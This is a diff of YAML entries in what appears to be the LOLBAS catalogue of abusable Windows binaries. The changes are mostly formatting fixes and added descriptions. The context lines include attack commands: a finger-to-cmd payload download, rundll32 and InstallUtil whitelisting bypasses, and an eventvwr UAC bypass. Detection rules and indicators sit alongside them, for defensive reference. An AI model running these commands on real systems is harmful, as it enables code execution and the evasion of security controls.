  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,13 +17,12 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
 Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@tim8288'
  - Person: Hai Vaknin
    Handle: '@vakninhai'
---
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -22,15 +22,14 @@ Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- - IOC: Child process from diskshadow.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
+  - IOC: Child process from diskshadow.exe
 Resources:
  - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -15,10 +15,10 @@ Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
+  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
 Resources:
  - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
@ -32,4 +32,3 @@ Acknowledgement:
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'
---
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -50,14 +50,14 @@ Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
+  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
 Resources:
  - Link: https://twitter.com/egre55/status/985994639202283520
  - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
@ -66,5 +66,4 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Mike Cary
-    Handle: 'grayfold3d'
---
+    Handle: '@grayfold3d'
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -7,7 +7,7 @@ Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
-    Category: UAC bypass
+    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -29,10 +29,10 @@ Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
 Resources:
  - Link: https://twitter.com/infosecn1nja/status/986628482858807297
  - Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@ -41,4 +41,3 @@ Acknowledgement:
    Handle: '@infosecn1nja'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@CyberRaiju'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -1,6 +1,6 @@
 ---
 Name: Extexport.exe
-Description:
+Description: Load a DLL located in the c:\test folder with a specific name.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Program Files\Internet Explorer\Extexport.exe
  - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml
  - IOC: Extexport.exe loads dll and is execute from other folder the original path
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -1,6 +1,6 @@
 ---
 Name: Extrac32.exe
-Description:
+Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -38,9 +38,9 @@ Full_Path:
 Code_Sample:
  - Code:
 Detection:
- - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
 Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -54,4 +54,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Tamir Yehuda
    Handle: '@tim8288'
---
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -1,6 +1,6 @@
 ---
 Name: Findstr.exe
-Description:
+Description: Write to ADS, discover, or download files with Findstr.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -36,13 +36,12 @@ Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
 Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@ -1,31 +1,30 @@
---
-Name: Finger.exe
-Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
-Author: Ruben Revuelta
-Created: 2021-08-30
-Commands:
-  - Command: finger user@example.host.com | more +2 | cmd
-    Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
-    Usecase: Download malicious payload
-    Category: Download
-    Privileges: User
-    MitreID: T1105
-    OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
-Full_Path:
-  - Path: c:\windows\system32\finger.exe
-  - Path: c:\windows\syswow64\finger.exe
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
-  - IOC: finger.exe should not be run on a normal workstation.
-  - IOC: finger.exe connecting to external resources.
-Resources:
-  - Link: https://twitter.com/DissectMalware/status/997340270273409024
-  - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
-Acknowledgement:
-  - Person: Ruben Revuelta (MAPFRE CERT)
-    Handle: '@rubn_RB'
-  - Person: Jose A. Jimenez (MAPFRE CERT)
-    Handle: '@Ocelotty6669'
-  - Person: Malwrologist
-    Handle: '@DissectMalware'
---
+---
+Name: Finger.exe
+Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
+Author: Ruben Revuelta
+Created: 2021-08-30
+Commands:
+  - Command: finger user@example.host.com | more +2 | cmd
+    Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
+    Usecase: Download malicious payload
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\finger.exe
+  - Path: c:\windows\syswow64\finger.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
+  - IOC: finger.exe should not be run on a normal workstation.
+  - IOC: finger.exe connecting to external resources.
+Resources:
+  - Link: https://twitter.com/DissectMalware/status/997340270273409024
+  - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
+Acknowledgement:
+  - Person: Ruben Revuelta (MAPFRE CERT)
+    Handle: '@rubn_RB'
+  - Person: Jose A. Jimenez (MAPFRE CERT)
+    Handle: '@Ocelotty6669'
+  - Person: Malwrologist
+    Handle: '@DissectMalware'
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'
---
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -22,9 +22,9 @@ Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
 Resources:
  - Link: https://twitter.com/vector_sec/status/896049052642533376
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@vector_sec'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -22,10 +22,10 @@ Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- - IOC: cmd /c as child process of ftp.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
+  - IOC: cmd /c as child process of ftp.exe
 Resources:
  - Link: https://twitter.com/0xAmit/status/1070063130636640256
  - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
@ -37,5 +37,4 @@ Acknowledgement:
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
-    Handle: '@0xAmit '
---
+    Handle: '@0xAmit'
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -176,4 +176,3 @@ Resources:
 Acknowledgement:
  - Person: Jesus Galvez
    Handle:
---
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -1,6 +1,6 @@
 ---
 Name: Ie4uinit.exe
-Description:
+Description: Executes commands from a specially prepared ie4uinit.inf file.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -17,6 +17,7 @@ Commands:
    Category: Compile
    Privileges: User
    MitreID: T1127
+    OperatingSystem: Windows 10,7
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Lior Adar
    Handle:
---
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -15,10 +15,10 @@ Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
 Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
+  - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
 Resources:
  - Link: https://twitter.com/KyleHanslovan/status/911997635455852544
  - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Kyle Hanslovan
    Handle: '@kylehanslovan'
---
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -7,7 +7,7 @@ Commands:
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,11 +24,11 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
 Resources:
  - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
  - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
@ -39,4 +39,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Malwrologist
    Handle: '@DissectMalware'
---
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@gN3mes1s'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@FortyNorthSec'
  - Person: Bank Security
    Handle: '@Bank_Security'
---
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -22,10 +22,10 @@ Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
 Resources:
  - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
  - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@bohops'
  - Person: clem
    Handle: '@clavoillotte'
---
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -53,4 +53,3 @@ Acknowledgement:
    Handle: ''
  - Person: Cedric
    Handle: '@th3c3dr1c'
---
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -7,7 +7,7 @@ Commands:
  - Command: msbuild.exe pshell.xml
    Description: Build and execute a C# project stored in the target XML file.
    Usecase: Compile and run code
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -60,7 +60,7 @@ Detection:
  - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules 
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Msbuild.exe should not normally be executed on workstations
 Resources:
  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
@ -77,4 +77,3 @@ Acknowledgement:
    Handle: '@Cneelis'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -14,7 +14,7 @@ Commands:
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -69,4 +69,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -51,4 +51,3 @@ Acknowledgement:
    Handle: '@netbiosX'
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Adam
    Handle: '@Hexacorn'
---
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@ -19,4 +19,3 @@ Detection:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -38,4 +38,3 @@ Acknowledgement:
    Handle: '@kylehanslovan'
  - Person: Fab
    Handle: '@0rbz_'
---
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
